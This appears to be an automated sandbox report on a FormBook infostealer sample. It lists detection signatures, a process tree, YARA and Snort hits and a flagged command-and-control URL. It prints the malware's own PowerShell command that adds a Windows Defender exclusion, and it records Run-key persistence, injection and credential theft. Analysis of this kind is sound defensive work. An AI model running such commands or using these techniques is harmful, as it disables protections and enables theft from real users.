Windows Analysis Report
SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe

Overview

General Information

Sample name: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe
Analysis ID: 1467140
MD5: 0d866e84b1b42f3b924d671db5b3b40e
SHA1: 8890d49ef3267c6c6697c0e56b85ce118e0f7eef
SHA256: 74f7be7a0e6e10f0209d700876ab03eb9d37cdcab79c0def5d536eb8accbf49f
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected UAC Bypass using CMSTP
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Disables UAC (registry)
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign process
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe (PID: 1512 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe" MD5: 0D866E84B1B42F3B924D671DB5B3B40E)
    • conhost.exe (PID: 2496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5072 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 6904 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • csc.exe (PID: 1816 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
    • wmplayer.exe (PID: 6464 cmdline: "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" MD5: A7790328035BBFCF041A6D815F9C28DF)
      • NwXvnHITawmpBkkZKEXJ.exe (PID: 4324 cmdline: "C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • sc.exe (PID: 6836 cmdline: "C:\Windows\SysWOW64\sc.exe" MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
          • NwXvnHITawmpBkkZKEXJ.exe (PID: 5680 cmdline: "C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2876 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • WerFault.exe (PID: 716 cmdline: C:\Windows\system32\WerFault.exe -u -p 1512 -s 1456 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • wmplayer.exe (PID: 768 cmdline: "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" MD5: A7790328035BBFCF041A6D815F9C28DF)
    • unregmp2.exe (PID: 2244 cmdline: "C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon MD5: 51629AAAF753C6411D0B7D37620B7A83)
      • unregmp2.exe (PID: 2196 cmdline: "C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT MD5: A6FC8CE566DEC7C5873CB9D02D7B874E)
  • wmplayer.exe (PID: 6508 cmdline: "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" MD5: A7790328035BBFCF041A6D815F9C28DF)
  • cleanup
No configs have been found
Yara matches in process memory dumps (Source | Rule | Description | Author; matched strings are listed beneath each row):

0000000D.00000002.3944875828.0000000003180000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0000000D.00000002.3944875828.0000000003180000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2a9f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13f5f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
00000006.00000002.2322232096.00000000035F0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000006.00000002.2322232096.00000000035F0000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2a9f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13f5f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
(14 further matches not shown)

Yara matches in unpacked PE files (Source | Rule | Description | Author; matched strings are listed beneath each row):

6.2.wmplayer.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
6.2.wmplayer.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2dd13:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17282:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0.2.SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe.1df0bbf5348.1.raw.unpack | INDICATOR_SUSPICIOUS_DisableWinDefender | Detects executables containing artifacts associated with disabling Windows Defender | ditekSHen
  • 0x4354e:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x44e12:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x44e8e:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x4f2ac:$e2: Add-MpPreference -ExclusionPath
  • 0x5076c:$e2: Add-MpPreference -ExclusionPath
6.2.wmplayer.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
6.2.wmplayer.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2cf13:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16482:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
(1 further match not shown)

System Summary

Source: Process started. Author: Florian Roth (Nextron Systems). Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, ParentProcessId: 1512, ParentProcessName: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe" -Force, ProcessId: 5072, ProcessName: powershell.exe
Source: Registry Key set. Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split). Data: Details: C:\Program Files (x86)\Windows Media Player\wmplayer.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\sc.exe, ProcessId: 6836, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PTR4CRBH
Source: Process started. Author: Florian Roth (Nextron Systems). Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, ParentProcessId: 1512, ParentProcessName: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe" -Force, ProcessId: 5072, ProcessName: powershell.exe
Source: Process started. Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements). Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, ParentProcessId: 1512, ParentProcessName: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe" -Force, ProcessId: 5072, ProcessName: powershell.exe
Snort IDS alerts (every alert below is TCP to destination port 80 with classtype "A Network Trojan was detected"):

Timestamp                | SID     | Source Port
07/03/24-18:41:52.311175 | 2855464 | 59424
07/03/24-18:41:19.435884 | 2855464 | 59417
07/03/24-18:42:13.805576 | 2855465 | 59432
07/03/24-18:43:25.886197 | 2855464 | 59451
07/03/24-18:43:37.573012 | 2855464 | 59454
07/03/24-18:40:48.928266 | 2855464 | 59407
07/03/24-18:42:55.058990 | 2855464 | 59441
07/03/24-18:43:51.413894 | 2855464 | 59458
07/03/24-18:41:32.918372 | 2855464 | 59421
07/03/24-18:42:06.211099 | 2855464 | 59429
07/03/24-18:42:27.326971 | 2855465 | 59436
07/03/24-18:43:45.249021 | 2855465 | 59457
07/03/24-18:42:08.749026 | 2855464 | 59430
07/03/24-18:43:30.949272 | 2855465 | 59453
07/03/24-18:42:41.373375 | 2855464 | 59437
07/03/24-18:40:56.597601 | 2855465 | 59410
07/03/24-18:42:19.719004 | 2855464 | 59433
07/03/24-18:43:59.021042 | 2855465 | 59461
07/03/24-18:41:37.979242 | 2855465 | 59423
07/03/24-18:41:54.857034 | 2855464 | 59426
07/03/24-18:42:57.593154 | 2855464 | 59442
07/03/24-18:44:08.627000 | 2855465 | 59462
07/03/24-18:41:30.383840 | 2855464 | 59420
07/03/24-18:42:22.262975 | 2855464 | 59434
07/03/24-18:41:06.087866 | 2855464 | 59412
07/03/24-18:43:02.663109 | 2855465 | 59445
07/03/24-18:43:11.697394 | 2855464 | 59447
07/03/24-18:41:59.948522 | 2855465 | 59428
07/03/24-18:42:49.010973 | 2855465 | 59440
07/03/24-18:43:23.357004 | 2855464 | 59450
07/03/24-18:41:24.528998 | 2855465 | 59419
07/03/24-18:40:33.146485 | 2855465 | 59401
07/03/24-18:42:43.900906 | 2855464 | 59438
07/03/24-18:41:16.892814 | 2855464 | 59416
07/03/24-18:43:16.765404 | 2855465 | 59449
07/03/24-18:41:03.551279 | 2855464 | 59411
07/03/24-18:43:40.139322 | 2855464 | 59455
07/03/24-18:40:51.463532 | 2855464 | 59408
07/03/24-18:43:53.949463 | 2855464 | 59459
07/03/24-18:41:11.155608 | 2855465 | 59414
07/03/24-18:43:09.167025 | 2855464 | 59446

AV Detection

Source: http://www.vertilehub.xyz/ei4t/?3pSl=bXiTJHhxyN&Z6ZTG=vJK+R49o60hMb5R0zuW0LjMDSBoWblw/xm7bGUo972WEnNUAqilJR4ikt7uwBrcRV8UZThTaEWZ7S+DdGKZTmgrpJBBQs9ifJOYm4nfBSZlzTv8zXZPL/ZPwonFSFx1LsUa4ZMM=; Avira URL Cloud: Label: malware
Source: http://www.vertilehub.xyz/ei4t/; Avira URL Cloud: Label: malware
Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe; ReversingLabs: Detection: 21%
Source: Yara match; File source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000D.00000002.3944875828.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.2322232096.00000000035F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000E.00000002.3948817261.00000000057D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.2321692626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000002.3945190684.00000000032D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.3945837611.00000000038C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.2322275427.00000000040C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability

Exploits

Source: Yara match; File source: 00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe PID: 1512, type: MEMORYSTR
Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2459015863.000001DF2471B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER9BF4.tmp.dmp.9.dr
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2459015863.000001DF246C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2459015863.000001DF2471B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.PDB source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2459015863.000001DF2471B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.ni.pdbRSDS source: WER9BF4.tmp.dmp.9.dr
Source: Binary string: System.Windows.Forms.ni.pdb source: WER9BF4.tmp.dmp.9.dr
Source: Binary string: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.PDBH source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2453568054.000000AA40102000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: wmplayer.exe, 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2230114991.00000000030F5000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2228408124.0000000002F48000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.2321922412.000000000343E000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 0000000D.00000003.2321954921.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 0000000D.00000003.2323720085.000000000338F000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: sc.pdbUGP source: wmplayer.exe, 00000006.00000002.2321810526.0000000002E47000.00000004.00000020.00020000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000B.00000002.3944318113.00000000011D8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Drawing.ni.pdb source: WER9BF4.tmp.dmp.9.dr
Source: Binary string: wntdll.pdb source: wmplayer.exe, wmplayer.exe, 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2230114991.00000000030F5000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2228408124.0000000002F48000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.2321922412.000000000343E000.00000040.00001000.00020000.00000000.sdmp, sc.exe, sc.exe, 0000000D.00000003.2321954921.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 0000000D.00000003.2323720085.000000000338F000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.PDB source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2453568054.000000AA40102000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER9BF4.tmp.dmp.9.dr
Source: Binary string: sc.pdb source: wmplayer.exe, 00000006.00000002.2321810526.0000000002E47000.00000004.00000020.00020000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000B.00000002.3944318113.00000000011D8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER9BF4.tmp.dmp.9.dr
Source: Binary string: System.Drawing.ni.pdbRSDS source: WER9BF4.tmp.dmp.9.dr
Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdbCoe source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2459015863.000001DF2471B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: WER9BF4.tmp.dmp.9.dr
Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2454248653.000001DF0A0A3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.VisualBasic.pdb source: WER9BF4.tmp.dmp.9.dr
Source: Binary string: System.Core.ni.pdb source: WER9BF4.tmp.dmp.9.dr
Source: Binary string: pC:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.PDB source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2453568054.000000AA40102000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.Windows.Forms.pdb source: WER9BF4.tmp.dmp.9.dr
Source: Binary string: mscorlib.pdb` source: WER9BF4.tmp.dmp.9.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2454248653.000001DF0A114000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2454248653.000001DF0A114000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2459015863.000001DF2471B000.00000004.00000020.00020000.00000000.sdmp, WER9BF4.tmp.dmp.9.dr
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb.0e source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2459015863.000001DF246C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER9BF4.tmp.dmp.9.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbx. source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2454248653.000001DF0A114000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: NwXvnHITawmpBkkZKEXJ.exe, 0000000B.00000002.3942485337.0000000000A7E000.00000002.00000001.01000000.00000009.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000000.2386545627.0000000000A7E000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: System.Drawing.pdb source: WER9BF4.tmp.dmp.9.dr
Source: Binary string: mscorlib.ni.pdb source: WER9BF4.tmp.dmp.9.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2459015863.000001DF2471B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbPROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocaQ, source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2454248653.000001DF0A114000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2459015863.000001DF2471B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: WER9BF4.tmp.dmp.9.dr
Source: Binary string: Microsoft.VisualBasic.pdb- source: WER9BF4.tmp.dmp.9.dr
Source: Binary string: wmplayer.pdbGCTL source: sc.exe, 0000000D.00000002.3946994371.0000000003B6C000.00000004.10000000.00040000.00000000.sdmp, sc.exe, 0000000D.00000002.3942849584.0000000002EFE000.00000004.00000020.00020000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000002.3946036134.000000000339C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2615659691.00000000191BC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: wmplayer.pdb source: sc.exe, 0000000D.00000002.3946994371.0000000003B6C000.00000004.10000000.00040000.00000000.sdmp, sc.exe, 0000000D.00000002.3942849584.0000000002EFE000.00000004.00000020.00020000.00000000.sdmp, NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000002.3946036134.000000000339C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2615659691.00000000191BC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: System.ni.pdb source: WER9BF4.tmp.dmp.9.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER9BF4.tmp.dmp.9.dr
            Source: C:\Windows\System32\unregmp2.exeFile opened: z:
            Source: C:\Windows\System32\unregmp2.exeFile opened: x:
            Source: C:\Windows\System32\unregmp2.exeFile opened: v:
            Source: C:\Windows\System32\unregmp2.exeFile opened: t:
            Source: C:\Windows\System32\unregmp2.exeFile opened: r:
            Source: C:\Windows\System32\unregmp2.exeFile opened: p:
            Source: C:\Windows\System32\unregmp2.exeFile opened: n:
            Source: C:\Windows\System32\unregmp2.exeFile opened: l:
            Source: C:\Windows\System32\unregmp2.exeFile opened: j:
            Source: C:\Windows\System32\unregmp2.exeFile opened: h:
            Source: C:\Windows\System32\unregmp2.exeFile opened: f:
            Source: C:\Windows\System32\unregmp2.exeFile opened: b:
            Source: C:\Windows\System32\unregmp2.exeFile opened: y:
            Source: C:\Windows\System32\unregmp2.exeFile opened: w:
            Source: C:\Windows\System32\unregmp2.exeFile opened: u:
            Source: C:\Windows\System32\unregmp2.exeFile opened: s:
            Source: C:\Windows\System32\unregmp2.exeFile opened: q:
            Source: C:\Windows\System32\unregmp2.exeFile opened: o:
            Source: C:\Windows\System32\unregmp2.exeFile opened: m:
            Source: C:\Windows\System32\unregmp2.exeFile opened: k:
            Source: C:\Windows\System32\unregmp2.exeFile opened: i:
            Source: C:\Windows\System32\unregmp2.exeFile opened: g:
            Source: C:\Windows\System32\unregmp2.exeFile opened: e:
            Source: C:\Windows\System32\unregmp2.exeFile opened: c:
            Source: C:\Windows\System32\unregmp2.exeFile opened: a:
            Source: C:\Windows\SysWOW64\sc.exeCode function: 13_2_02E1BCA0 FindFirstFileW,FindNextFileW,FindClose,13_2_02E1BCA0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: C:\Users\user\AppData
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: C:\Users\user
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: C:\Users\user\AppData\Roaming
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4x nop then xor eax, eax13_2_02E09710
            Source: C:\Windows\SysWOW64\sc.exeCode function: 4x nop then mov ebx, 00000004h13_2_033B0541

            Networking

